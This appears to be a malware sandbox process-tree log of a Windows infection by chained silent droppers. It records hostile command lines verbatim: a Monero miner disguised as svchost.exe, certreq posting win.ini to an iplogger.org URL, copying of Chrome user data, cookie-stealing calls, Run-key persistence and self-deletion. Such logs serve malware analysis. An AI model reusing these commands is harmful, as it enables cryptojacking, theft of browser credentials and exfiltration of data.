C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,8120926454926013171,15785413314382616998,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1700 /prefetch:210⤵PID:8888
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nohgv0kdb3j\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\nohgv0kdb3j\Setup3310.exe" /Verysilent /subid=5778⤵PID:6388
-
C:\Users\Admin\AppData\Local\Temp\is-JBG2H.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-JBG2H.tmp\Setup3310.tmp" /SL5="$10582,802346,56832,C:\Users\Admin\AppData\Local\Temp\nohgv0kdb3j\Setup3310.exe" /Verysilent /subid=5779⤵PID:7060
-
C:\Users\Admin\AppData\Local\Temp\is-HAE26.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HAE26.tmp\Setup.exe" /Verysilent10⤵PID:7452
-
C:\Users\Admin\AppData\Local\Temp\is-G9J4D.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-G9J4D.tmp\Setup.tmp" /SL5="$40650,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-HAE26.tmp\Setup.exe" /Verysilent11⤵PID:7552
-
C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\ProPlugin.exe" /Verysilent12⤵PID:7880
-
C:\Users\Admin\AppData\Local\Temp\is-LI08N.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-LI08N.tmp\ProPlugin.tmp" /SL5="$B0498,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\ProPlugin.exe" /Verysilent13⤵PID:6836
-
C:\Users\Admin\AppData\Local\Temp\is-AHLM6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AHLM6.tmp\Setup.exe"14⤵PID:7324
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"15⤵PID:6108
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\DataFinder.exe"C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\DataFinder.exe" /Verysilent12⤵PID:7800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth13⤵PID:8100
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\Delta.exe" /Verysilent12⤵PID:6600
-
C:\Users\Admin\AppData\Local\Temp\is-EH3QJ.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-EH3QJ.tmp\Delta.tmp" /SL5="$11055A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\Delta.exe" /Verysilent13⤵PID:7332
-
C:\Users\Admin\AppData\Local\Temp\is-O10L1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-O10L1.tmp\Setup.exe" /VERYSILENT14⤵PID:8152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8152 -s 96015⤵
- Program crash
PID:8092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8152 -s 96415⤵
- Program crash
PID:8112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8152 -s 108815⤵
- Program crash
PID:6412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8152 -s 112415⤵
- Program crash
PID:5068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8152 -s 119615⤵
- Program crash
PID:7668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8152 -s 129615⤵
- Program crash
PID:4384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8152 -s 130415⤵
- Program crash
PID:6328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8152 -s 155215⤵
- Program crash
PID:8184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8152 -s 157615⤵
- Program crash
PID:7336
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\zznote.exe" /Verysilent12⤵PID:2644
-
C:\Users\Admin\AppData\Local\Temp\is-372G7.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-372G7.tmp\zznote.tmp" /SL5="$12055A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\zznote.exe" /Verysilent13⤵PID:1784
-
C:\Users\Admin\AppData\Local\Temp\is-PMC5U.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-PMC5U.tmp\jg4_4jaa.exe" /silent14⤵PID:6288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-2BTPD.tmp\hjjgaa.exe" /Verysilent12⤵PID:6248
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:2064
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:7936
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hyzd5zlgmrd\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\hyzd5zlgmrd\chashepro3.exe" /VERYSILENT8⤵PID:6504
-
C:\Users\Admin\AppData\Local\Temp\is-SFBL5.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-SFBL5.tmp\chashepro3.tmp" /SL5="$205EA,1446038,58368,C:\Users\Admin\AppData\Local\Temp\hyzd5zlgmrd\chashepro3.exe" /VERYSILENT9⤵PID:4268
-
C:\Program Files (x86)\JCleaner\whiterauf.exe"C:\Program Files (x86)\JCleaner\whiterauf.exe"10⤵PID:4308
-
C:\Program Files (x86)\JCleaner\whiterauf.exe"{path}"11⤵PID:6852
-
-
C:\Program Files (x86)\JCleaner\whiterauf.exe"{path}"11⤵PID:7928
-
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"10⤵PID:6452
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"11⤵PID:5516
-
-
-
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"10⤵PID:4056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"10⤵PID:6872
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"10⤵PID:3996
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵PID:6960
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵PID:7344
-
-
-
C:\Program Files (x86)\JCleaner\5.exe"C:\Program Files (x86)\JCleaner\5.exe"10⤵PID:6908
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"11⤵PID:7472
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK12⤵
- Delays execution with timeout.exe
PID:6392
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v5hd1m0duce\brd0mziah2t.exe"C:\Users\Admin\AppData\Local\Temp\v5hd1m0duce\brd0mziah2t.exe" /ustwo INSTALL8⤵PID:4144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 6529⤵
- Program crash
PID:4504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 6689⤵
- Program crash
PID:7292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 7129⤵
- Program crash
PID:7460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 8049⤵
- Program crash
PID:7704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 8809⤵
- Program crash
PID:7984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 9289⤵
- Program crash
PID:7692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 11929⤵
- Program crash
PID:7840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 12369⤵
- Program crash
PID:8032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 13569⤵
- Program crash
PID:4928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 13489⤵
- Program crash
PID:6228
-
-
-
C:\Users\Admin\AppData\Local\Temp\ynvg1hvkecb\safebits.exe"C:\Users\Admin\AppData\Local\Temp\ynvg1hvkecb\safebits.exe" /S /pubid=1 /subid=4518⤵PID:10212
-
-
C:\Users\Admin\AppData\Local\Temp\3ftduxd52wh\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\3ftduxd52wh\Setup3310.exe" /Verysilent /subid=5778⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\is-R6E4P.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-R6E4P.tmp\Setup3310.tmp" /SL5="$20878,802346,56832,C:\Users\Admin\AppData\Local\Temp\3ftduxd52wh\Setup3310.exe" /Verysilent /subid=5779⤵PID:9916
-
C:\Users\Admin\AppData\Local\Temp\is-GEI2Q.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GEI2Q.tmp\Setup.exe" /Verysilent10⤵PID:9716
-
C:\Users\Admin\AppData\Local\Temp\is-E00AS.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-E00AS.tmp\Setup.tmp" /SL5="$E06E0,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-GEI2Q.tmp\Setup.exe" /Verysilent11⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\is-6D61K.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-6D61K.tmp\ProPlugin.exe" /Verysilent12⤵PID:6724
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\duo2p2ihccz\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\duo2p2ihccz\askinstall24.exe"8⤵PID:10092
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:10284
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:10892
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y9⤵PID:10588
-
-
-
C:\Users\Admin\AppData\Local\Temp\bcozekwomfz\atm5c5bffjf.exe"C:\Users\Admin\AppData\Local\Temp\bcozekwomfz\atm5c5bffjf.exe" /ustwo INSTALL8⤵PID:352
-
-
C:\Users\Admin\AppData\Local\Temp\tltnhe2quqr\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\tltnhe2quqr\chashepro3.exe" /VERYSILENT8⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\is-73A8A.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-73A8A.tmp\chashepro3.tmp" /SL5="$108D6,1446038,58368,C:\Users\Admin\AppData\Local\Temp\tltnhe2quqr\chashepro3.exe" /VERYSILENT9⤵PID:10084
-
-
-
C:\Users\Admin\AppData\Local\Temp\zscm23hi54q\vict.exe"C:\Users\Admin\AppData\Local\Temp\zscm23hi54q\vict.exe" /VERYSILENT /id=5358⤵PID:9648
-
C:\Users\Admin\AppData\Local\Temp\is-340VR.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-340VR.tmp\vict.tmp" /SL5="$208EA,870426,780800,C:\Users\Admin\AppData\Local\Temp\zscm23hi54q\vict.exe" /VERYSILENT /id=5359⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\is-OCOMS.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-OCOMS.tmp\wimapi.exe" 53510⤵PID:7096
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
PID:3188 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:2976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:3768
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2116
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:212
-
C:\ProgramData\6319048.69"C:\ProgramData\6319048.69"5⤵
- Executes dropped EXE
PID:4044
-
-
C:\ProgramData\4249737.46"C:\ProgramData\4249737.46"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3928 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
PID:2788
-
-
-
C:\ProgramData\8231898.90"C:\ProgramData\8231898.90"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2720
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:488 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:2736
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:4472
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7484
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1864 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 12F3BBCED2EBBCF04FCB5300C1EBB0AD C2⤵
- Loads dropped DLL
PID:3480
-
-
C:\Users\Admin\AppData\Local\Temp\is-TUOOG.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-TUOOG.tmp\chashepro3.tmp" /SL5="$20278,1446038,58368,C:\Users\Admin\AppData\Local\Temp\0qg4nfalfgx\chashepro3.exe" /VERYSILENT1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4956 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"2⤵
- Checks computer location settings
PID:2416
-
-
C:\Program Files (x86)\JCleaner\whiterauf.exe"C:\Program Files (x86)\JCleaner\whiterauf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4272 -
C:\Program Files (x86)\JCleaner\whiterauf.exe"{path}"3⤵PID:3968
-
-
C:\Program Files (x86)\JCleaner\whiterauf.exe"{path}"3⤵PID:1856
-
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4284 -
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"3⤵
- Executes dropped EXE
PID:5488
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"3⤵PID:5496
-
-
-
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:4264
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\22⤵PID:4048
-
-
C:\Program Files (x86)\JCleaner\5.exe"C:\Program Files (x86)\JCleaner\5.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1568 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"3⤵PID:4968
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:4676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-D50S9.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-D50S9.tmp\Setup3310.tmp" /SL5="$20290,802346,56832,C:\Users\Admin\AppData\Local\Temp\y1t0p2c5lti\Setup3310.exe" /Verysilent /subid=5771⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4992 -
C:\Users\Admin\AppData\Local\Temp\is-CT7SI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-CT7SI.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5360 -
C:\Users\Admin\AppData\Local\Temp\is-N6C9J.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-N6C9J.tmp\Setup.tmp" /SL5="$303B2,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-CT7SI.tmp\Setup.exe" /Verysilent3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5424
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of SetWindowsHookEx
PID:4300
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\21⤵PID:3800
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6056
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6128
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5512
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5404
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1652
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4984
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:3996 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{44a17815-34e3-5e42-a2aa-9e0bad033742}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:3772
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:4796
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:212
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:4724
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:5552 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5768
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Modifies data under HKEY_USERS
PID:5500
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5596
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:5924
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:736
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4204
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4684
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5080
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:768
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff716a17740,0x7ff716a17750,0x7ff716a177601⤵PID:6896
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1196
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5040
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4141⤵PID:4404
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5928
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf0,0xf4,0xf8,0xcc,0xfc,0x7ffb4f936e00,0x7ffb4f936e10,0x7ffb4f936e201⤵PID:7176
-
